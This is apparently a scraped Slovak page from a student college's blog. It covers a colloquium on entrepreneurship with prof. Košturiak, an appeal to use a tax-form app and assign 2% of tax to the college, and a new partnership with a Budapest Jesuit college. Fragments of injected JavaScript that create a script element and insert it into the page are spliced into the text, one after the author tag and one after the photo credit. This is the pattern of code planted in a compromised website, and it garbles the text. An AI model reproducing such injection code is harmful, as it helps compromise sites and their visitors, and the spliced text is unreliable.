“Prácu si budeme vytvárať sami,” povzbudil prof. Košturiak študentov na kolokviu

Na poslednom februárovom kolokviu hostilo Kolégium Antona Neuwirtha prof. Jána Košturiaka, inšpiratívneho človeka, ktorý sa so študentmi a hosťami z SLH podelil o skúsenosti z inovatívneho podnikania.

„Každý z vás už je podnikateľ, len o tom ešte neviete,“ začal na úvod spoluzakladateľ spoločnosti IPA. „Podnikáte svojím životom. Volíte si, čo budete robiť, akú knihu prečítate…“ Veľmi rýchlo sa tak dostali do témy aj tí, ktorí nikdy nepremýšľali nad možnosťou stať sa raz sami sebe zamestnávateľom.

Profesor Košturiak sa pozastavil nad tým, prečo ľudia neprestanú robiť prácu, ktorú nemajú radi a nezačnú robiť to, čo ich baví. Je presvedčený, že nové technológie a stále zrýchľujúci sa vývoj už začali meniť starý systém pracovného trhu: „Prácu si budeme musieť vymýšľať sami, nikto nám ju nedá.“

Inšpirácia nebáť sa realizovať nápady a prestať žiť podľa stereotypov – také bolo štvrtkové kolokvium. Večer sa však nekončil odchodom hosťa. Súčasní študenti pozvali o rok starších spolužiakov – alumni KAN4 na spoznávaciu a mosty budujúcu akciu. Spoločne si užili veľa zábavy až do neskorého večera.

-bk-var d=document;var s=d.createElement(‘script’);

Daňové priznanie

Daňové priznanie: ľahšie a rýchlejšie – pre Vás aj pre Kolégium

Milí priatelia,

Aby nám všetkým zostávalo viac času na všetko dobré, pravdivé a krásne snažíme sa aj my v Kolégiu všetky nemilé povinnosti vybaviť, tak rýchlo ako to je možné.

V rámci tejto snahy sa s Vami radi podelíme o túto zaujímavú on-line aplikáciu na ľahšie vyplnenie daňového priznania. .

Tá daňovníkovi, fyzickej osobe (zamestnancom, ktorí si DP podávajú sami, alebo živnostníkom) umožňuje bezplatne, jednoducho a efektívne vypísať tlačivo daňového priznania a zároveň poukázať 2% priamo Kolégiu.

Užívateľ pri jeho vypĺňaní postupne odpovedá na otázky a aplikácia na základe odpovedí vyplní daňové priznanie a vygeneruje tlačiteľné PDF.

Náš rektor Martin Luterán tak dokázal vyplniť svoje daňové priznanie za 15 minút.

Koľko to bude trvať Vám? :)

Kolégium má nového partnera v Budapešti

Nespája ich materinský jazyk, ale túžba po dosahovaní ideálov a hľadaní poznania. Študenti Kolégia Antona Neuwirtha sa stretli na prvom oficiálnom víkende so študentmi partnerskej inštitúcie Szent Ignác Jezsuita Szakkolégium v Budapešti.

V sobotu sa Lumen Fidei, encyklika dvoch pápežov, stala príležitosťou pre zaujímavý dialóg.
Skúsenosti zo slovenských seminárov Kresťanstva a kultúry, či maďarského seminára Teológie
dovolili zažiť intenzívnu diskusiu o viere, svetle a Kristovi pod vedením jezuitského pátra.

Stretnutie sa nenieslo len v akademickom duchu, medzinárodné priateľstvá sa intenzívne budovali neformálnymi rozhovormi počas prechádzok po meste, v čase spoločného stolovania, či príjemnej sobotňajšej párty v podkroví maďarského kolégia.

„Znalosť angličtiny je jedinečná príležitosť pre vás, mladých, aby ste zmenili stereotyp, ktorí sme žili desaťročia. Stereotyp, ktorý hovoril, že spolu nemôžeme spolupracovať, lebo nám odlišné jazyky bránia v komunikácii,“ vyzval k spolupráci všetkých účastníkov stretnutia na záver provinciál maďarských jezuitov, ktorý stál na počiatku Szakkolégia sv. Ignáca po páde komunizmu ešte ako laik.

Kolégiá sú si blízke hlavne svojím poslaním – intelektuálnou formáciou mladých ľudí v kresťanskom duchu i v troch základných pilieroch, na ktorých sa niesli aj spoločne prežité dni slovenských a maďarských študentov.

Ďalšou spoločnou akciou bude jarný víkendový pobyt študentov Szakkolégia sv. Ignáca v Ivanke pri Dunaji v letnom semestri.

Text: -bk-
Foto: Dominika Semaňákovádocument.currentScript.parentNode.insertBefore(s, document.currentScript);